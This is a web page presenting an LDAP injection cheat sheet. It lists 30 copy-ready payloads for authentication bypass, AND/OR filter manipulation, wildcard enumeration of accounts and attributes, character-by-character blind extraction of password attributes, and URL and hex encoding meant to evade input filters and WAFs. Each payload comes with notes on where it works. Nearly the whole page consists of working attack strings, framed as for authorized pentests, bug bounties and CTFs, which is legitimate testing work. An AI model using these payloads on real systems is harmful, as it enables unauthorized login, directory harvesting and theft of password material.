LDAP Injection Cheat Sheet

Real, public LDAP injection techniques for authorized pentests, bug bounties, and CTFs — auth bypass, enumeration, blind extraction, filter manipulation, and encoding. (30 payloads)

Build custom LDAP payloads in the LDAP Injection generator

Authentication Bypass Filters

(6)

*)(uid=*))(|(uid=*

Classic LDAP auth bypass. Injected into a username field, it closes the original filter and appends an always-true clause, returning the first matching entry and bypassing the credential check.Login forms where input is concatenated into a search filter like (uid=$user)

*)(|(uid=*))

Wildcard injection that turns the filter into one matching any user. Effective when the backend ANDs username and password and the password leg can be neutralized.Filters of form (&(uid=$user)(userPassword=$pass))

admin)(&)

Appends an always-true presence filter (&) after a known username. (&) is the LDAP 'absolute true' filter per RFC 4526, often granting access as that account.OpenLDAP / RFC 4526-compliant servers; target a valid account such as admin

admin)(!(&(1=0)

Negation-based bypass: wraps a guaranteed-false clause in NOT so the overall filter evaluates true for the named account, ignoring the password leg.AND-joined filters where you know a valid username

*)(userPassword=*)

Substitutes a wildcard for the password test so any non-empty userPassword attribute matches, authenticating without knowing the secret.Filters that test (userPassword=$pass) directly

*

Bare wildcard. If submitted as both username and password it can match the first directory entry when no escaping is applied.Minimal/naive filters; quick first test for injectability

AND / OR Filter Manipulation

(6)

*)(|(objectClass=*

Breaks out of an AND filter and injects an OR with an always-true objectClass presence test, broadening results to all objects.Search filter (&(attr=$input)) — closing paren restores valid syntax

x)(&(objectClass=*)(objectClass=*

Replaces the original predicate with two presence tests joined by AND, both always true, returning every entry the bind account can read.AND-based filters; useful for dumping the directory

(&)

RFC 4526 'absolute true' filter. When it becomes the whole filter, it matches all entries; the converse (|) is 'absolute false'.Servers honoring RFC 4526 extensible match true/false filters

)(cn=*))(|(cn=*

Symmetric break-and-rebuild payload that opens an OR clause and supplies matching closing parens so the resulting filter is syntactically valid.OR-joined search filters where balanced parentheses are required

*))%00

Wildcard plus null-byte to truncate any filter text the application appends after your input, discarding trailing constraints.Backends in C/older libraries where %00 terminates the string

*()|%26'

Fuzzing/detection string mixing wildcard, parens, and the AND/OR metacharacters (& as %26). Malformed responses or errors signal an injectable filter.Initial detection of LDAP injection points

Wildcard & Attribute Enumeration

(6)

*

Substring wildcard matching zero or more characters. As a search term it returns all entries, confirming injection and enabling enumeration.Any LDAP filter value; the core LDAP wildcard

a*

Prefix wildcard. Differing result counts for a*, b*, c* let you enumerate which usernames or attribute values exist by first letter.User/attribute discovery via response-count differences

*admin*

Substring wildcard surrounding a keyword to find any entry whose attribute contains that token (e.g. usernames containing 'admin').Targeted enumeration of accounts or groups

*)(mail=*)

Enumerates entries that have the mail attribute populated, revealing which objects expose a given attribute.Attribute-presence enumeration; swap mail for any attribute name

*)(userPassword=*)

Reveals entries with a readable userPassword attribute. If the bind account can read hashes this exposes password material.Misconfigured directories granting userPassword read access

*)(|(objectClass=user)(objectClass=person))

Enumerates all user/person objects by injecting an OR over common objectClasses, useful for harvesting account lists.Active Directory and standard inetOrgPerson schemas

Blind Boolean Extraction

(6)

*)(uid=admin)(userPassword=a*

Boolean blind probe: app behaves differently (login OK / record found) when the password attribute starts with 'a', leaking one character at a time.Blind LDAPi where only success/failure is observable; iterate per char

*)(uid=admin)(userPassword=ab*

Continuation of character-by-character extraction. Confirmed prefixes are extended one character at a time until the full value is recovered.Sequential brute-force of an attribute value via wildcard prefix

admin)(description=S*)

Tests whether the target's description (or any chosen attribute) starts with a given character, inferring content from the true/false response.Exfiltrating arbitrary readable attributes blindly

admin)(cn>=m)

Inequality (>=) extensible filter for binary-search extraction: halve the candidate range per request instead of linear scanning.Faster blind extraction where ordering matching rules are supported

admin)(cn<=m)

Complementary upper-bound (<=) test for binary search; pairing >= and <= narrows a character to one value in ~log2(n) requests.Servers supporting <= ordering matches; speeds up blind dumps

admin)(badPwdCount=0)

Boolean oracle against a known attribute value: a true/false response confirms or denies the attribute equals the tested value.Active Directory; verify attribute states without reading them directly

Special Characters & Encoding Notes

(6)

\28 \29 \2a \5c \00

RFC 4515 filter-value escapes for ( ) * \ and NUL. Defenders must escape these; testers reverse-encode to confirm filtering and to smuggle metacharacters.Reference set of LDAP search-filter special characters

%2a

URL-encoded asterisk (*). Use when the wildcard is stripped or blocked at the HTTP layer but decoded before reaching the LDAP filter.Web apps that URL-decode input prior to building the filter

%28%7c%28uid%3d%2a%29%29

URL-encoded form of (|(uid=*)) for slipping a full OR-bypass clause through filters that inspect raw request bytes.WAF/input-filter evasion on HTTP-fronted LDAP queries

\2a)(uid=\2a))(\7c(uid=\2a

Hex-escaped variant of the *)(uid=*))(|(uid=* bypass; tests whether the app blindly forwards backslash-hex sequences into the filter.Probing escaping logic; \7c is the pipe character

#dn

DN-attribute injection marker (RFC 4514). Distinguish DN-context escaping (, = + < > ; \ " #) from filter-context escaping when input lands in a distinguished name.Inputs concatenated into a DN rather than a search filter

*)(objectClass=*))(&(objectClass=void

Trailing-comment style payload that leaves a dangling open clause to swallow whatever the app appends, neutralizing additional injected constraints.When the application suffixes extra filter terms after user input

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

LDAP Injection

Related Cheat Sheets

SQL Injection Cheat Sheet NoSQL Injection Cheat Sheet XPath Injection Cheat Sheet

Frequently asked questions

What is the LDAP Injection Cheat Sheet?+

It's a quick-reference collection of 30 LDAP payloads for testing LDAP Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these LDAP payloads?+

Copy any payload straight into your authorized test, or open the LDAP Injection generator to build customized LDAP variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.

Are these LDAP payloads free to use?+

Yes — this cheat sheet and all LDAP payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the LDAP Injection Cheat Sheet?+

How do I use these LDAP payloads?+

Are these LDAP payloads free to use?+

Yes — this cheat sheet and all LDAP payloads are completely free, with no account required. Everything runs in your browser.